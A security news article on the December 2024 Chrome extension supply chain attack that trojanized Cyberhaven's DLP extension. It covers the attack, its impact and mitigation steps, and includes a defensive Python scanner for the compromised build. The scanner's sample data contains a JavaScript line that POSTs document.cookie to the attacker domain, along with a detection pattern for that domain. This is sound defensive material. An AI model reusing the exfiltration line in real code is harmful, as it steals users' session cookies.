Critical Security Breach Affects Popular Chrome Extensions Including Cyberhaven DLP

CyberSecureFox 🦊

A supply chain attack on multiple Chrome browser extensions came to light in late December 2024, when security researchers found that several popular extensions had been trojanized, among them the browser extension of Cyberhaven's Data Loss Prevention (DLP) product. The incident shows that browser-based security tools are themselves attractive supply chain targets: a compromised extension inherits the permissions and the trust of the legitimate one it replaces.

Understanding the Cyberhaven Extension Compromise

The attack began on December 24th, when a Cyberhaven employee fell for a phishing email and approved a malicious OAuth application, which granted the attackers the right to publish extensions to the Chrome Web Store on the developer's behalf. Using that access, the attackers pushed a malicious build (version 24.10.4) of the company's Chrome extension, which Chrome then auto-updated onto users' browsers. The injected code harvested authenticated sessions and cookies (the payload targeted Facebook accounts in particular) and sent them to an attacker-controlled domain, cyberhavenext[.]pro.

Impact Assessment and Enterprise Exposure

Cyberhaven's customers include high-profile organizations such as Snowflake, Motorola, Canon and Reddit, so the compromise potentially exposed corporate sessions and data across many enterprises. The malicious build remained available for approximately 30 hours before it was detected and pulled from the Chrome Web Store; any browser that auto-updated to 24.10.4 during that window ran the malicious code, and any cookies it sent out stay valid until the corresponding sessions are revoked.

Broader Attack Surface and Additional Compromises

Researchers at Nudge Security have identified at least four other Chrome extensions hit by the same campaign, and analysis of the attack infrastructure suggests that further compromised extensions may still turn up; investigations are ongoing. The pattern points to a coordinated campaign against extension developers rather than a one-off, exploiting the trust users place in store-published extensions that update silently.

Security Mitigation Steps

Security teams are advised to take the following steps:

  • Verify that the Cyberhaven extension is no longer on version 24.10.4 and update any affected extension to a build released on December 26th or later
  • Reset passwords for accounts used from browsers that ran the compromised build, and revoke their active sessions: a password change alone does not invalidate a stolen session cookie
  • Rotate all API tokens and access credentials that were reachable from those browser sessions
  • Clear cookies and site data in the affected browser profiles and reset browser configurations
  • Review proxy, DNS and endpoint logs for connections to cyberhavenext[.]pro and other indicators of compromise
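As a practical check for the update and log-review steps above, the script below (example code written for this page, not Cyberhaven's or Google's tooling) scans a Chrome profile's Extensions directory for the two indicators the write-up gives: the Cyberhaven extension at version 24.10.4, and any bundled script referencing cyberhavenext[.]pro. The profile paths, the constructed sample extensions and their placeholder IDs are assumptions; to run it against a real profile, pass the Extensions directory as the first argument.

```python
"""Scan a Chrome profile's Extensions directory for the compromised Cyberhaven build.

Indicators are taken from the incident write-up: extension version 24.10.4 and the
exfiltration domain cyberhavenext.pro. Directory layouts, sample data and the
placeholder extension IDs below are assumptions for this added example.
"""
import json
import os
import re
import sys
import tempfile
from pathlib import Path

# Indicators of compromise from the write-up
MALICIOUS_NAME_FRAGMENT = "cyberhaven"
MALICIOUS_VERSION = "24.10.4"
IOC_DOMAIN = "cyberhavenext.pro"
# Match the domain as written in scripts, and also defanged forms such as cyberhavenext[.]pro
DOMAIN_RE = re.compile(r"cyberhavenext\s*\[?\.\]?\s*pro", re.IGNORECASE)


def default_extensions_dirs():
    """Chrome's default-profile Extensions directories (assumed locations; only existing ones are returned)."""
    home = Path.home()
    candidates = [
        home / "Library/Application Support/Google/Chrome/Default/Extensions",  # macOS
        home / ".config/google-chrome/Default/Extensions",                      # Linux
        Path(os.environ.get("LOCALAPPDATA", "")) / "Google/Chrome/User Data/Default/Extensions",  # Windows
    ]
    return [p for p in candidates if p.is_dir()]


def scan_extensions_dir(root):
    """Walk <root>/<extension id>/<version dir>/manifest.json and return a list of findings.

    Each finding is a dict with ext_id, name, version and reason. One extension can yield
    two findings: the known-bad version, and a bundled script that references the domain.
    """
    findings = []
    for manifest in Path(root).glob("*/*/manifest.json"):
        version_dir = manifest.parent
        ext_id = version_dir.parent.name
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or non-JSON manifest: skip it rather than abort the scan
        name = str(data.get("name", ""))
        version = str(data.get("version", ""))
        base = {"ext_id": ext_id, "name": name, "version": version}
        if MALICIOUS_NAME_FRAGMENT in name.lower() and version == MALICIOUS_VERSION:
            findings.append({**base, "reason": f"known-bad version {MALICIOUS_VERSION}"})
        # Check every bundled script for the exfiltration domain, whatever the version claims
        for script in sorted(version_dir.rglob("*.js")):
            try:
                text = script.read_text(encoding="utf-8", errors="ignore")
            except OSError:
                continue
            if DOMAIN_RE.search(text):
                rel = script.relative_to(version_dir)
                findings.append({**base, "reason": f"references {IOC_DOMAIN} in {rel}"})
                break
    return findings


def build_sample_tree(root):
    """Write a constructed (not real) Extensions tree: one clean, one bad-version, one clean-version but phoning home."""
    samples = {
        "a" * 32: ("1.0.0", "Harmless Notes", "console.log('hello');"),
        "b" * 32: ("24.10.4", "Cyberhaven", "fetch('https://cyberhavenext.pro/', {method: 'POST', body: document.cookie});"),
        "c" * 32: ("2.3.1", "Unrelated Tool", "const beacon = 'https://cyberhavenext.pro/';"),
    }
    for ext_id, (version, name, worker_js) in samples.items():
        version_dir = Path(root) / ext_id / f"{version}_0"  # Chrome appends _0 to the version directory name
        version_dir.mkdir(parents=True)
        (version_dir / "manifest.json").write_text(
            json.dumps({"manifest_version": 3, "name": name, "version": version}), encoding="utf-8")
        (version_dir / "worker.js").write_text(worker_js, encoding="utf-8")


def demo():
    """Run the scanner over the constructed tree in a temporary directory and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_extensions_dir(tmp)


if __name__ == "__main__":
    dirs = [Path(sys.argv[1])] if len(sys.argv) > 1 else default_extensions_dirs()
    results = [f for d in dirs for f in scan_extensions_dir(d)] if dirs else demo()
    if not dirs:
        print("No Chrome Extensions directory found; showing results for the constructed sample tree")
    for f in results:
        print(f"[!] {f['ext_id']} {f['name']!r} {f['version']}: {f['reason']}")
    if not results:
        print("No indicators found")
```

The version check alone is not enough: an attacker who re-published under a new version number, or a different extension that reuses the same infrastructure, is only caught by the domain search, which is why the script inspects every bundled script regardless of the manifest version. Against the constructed tree it reports the bad-version extension twice (version and domain) and the unrelated extension once.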

The incident is under investigation by Mandiant (Google) and federal law enforcement, underscoring its severity. It is also a reminder that the publishing account of an extension developer is a single point of failure for every installed copy: because the attackers obtained Chrome Web Store publishing rights through an OAuth consent grant rather than a stolen password, multi-factor authentication on the developer account alone would not have stopped them. Organizations that publish extensions should restrict which third-party OAuth applications can be authorized against their publisher accounts and review existing grants, and organizations that deploy extensions should audit them regularly and monitor for unexpected version changes and outbound connections.
